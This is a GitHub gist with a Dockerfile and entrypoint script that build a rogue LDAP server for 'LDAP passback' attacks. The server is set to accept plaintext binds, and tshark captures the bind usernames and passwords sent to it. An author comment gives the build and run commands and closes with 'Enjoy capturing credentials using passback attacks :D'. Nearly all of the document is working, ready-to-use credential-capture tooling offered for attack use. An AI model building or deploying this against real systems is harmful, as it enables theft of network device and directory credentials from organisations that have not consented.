Skip to content

Instantly share code, notes, and snippets.

@prishs

prishs/Ldap Passback Dockerfile

Last active July 19, 2023 07:21
Show Gist options
  • Save prishs/d853f8c66206b9f146bb2c91a3207c2c to your computer and use it in GitHub Desktop.
Save prishs/d853f8c66206b9f146bb2c91a3207c2c to your computer and use it in GitHub Desktop.
Download ZIP
ldap-passback-docker
Raw
entrypoint.sh
# entrypoint.sh
#!/usr/bin/env bash
service slapd start
tshark -i any -f "port 389" -Y "ldap.protocolOp == 0 && ldap.simple" -e ldap.name -e ldap.simple -Tjson 2> /dev/null
Raw
Ldap Passback Dockerfile
FROM debian
RUN apt-get update
RUN apt-get -y install ldap-utils
RUN echo -e "slapd slapd/internal/generated_adminpw password admin\nslapd slapd/password2 password admin\nslapd slapd/internal/adminpw password admin\nslapd slapd/password1 password admin\n" | debconf-set-selections
RUN apt-get -y install slapd
EXPOSE 389/tcp
RUN service slapd start
RUN echo olcSaslSecProps: noanonymous,minssf=0,passcred >> /etc/ldap/slapd.d/cn=config.ldif
RUN DEBIAN_FRONTEND=noninteractive apt-get -y install tshark
COPY entrypoint.sh /entrypoint.sh
ENTRYPOINT ["/bin/bash", "/entrypoint.sh"]
@prishs
Copy link
Author

prishs commented May 27, 2023
edited
Loading

ldap-passback-docker

https://infosecwriteups.com/ldap-passback-attacks-the-docker-way-b06971b65304

Quickly deploy an LDAP server with support for plaintext authentication usable for LDAP PassBack attacks.
Usage

Clone the repository
Build docker image with the following command:

docker build -t ldap-passback .

Start the container with the following command:

docker run --rm -ti -p 389:389 ldap-passback

Enjoy capturing credentials using passback attacks :D

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment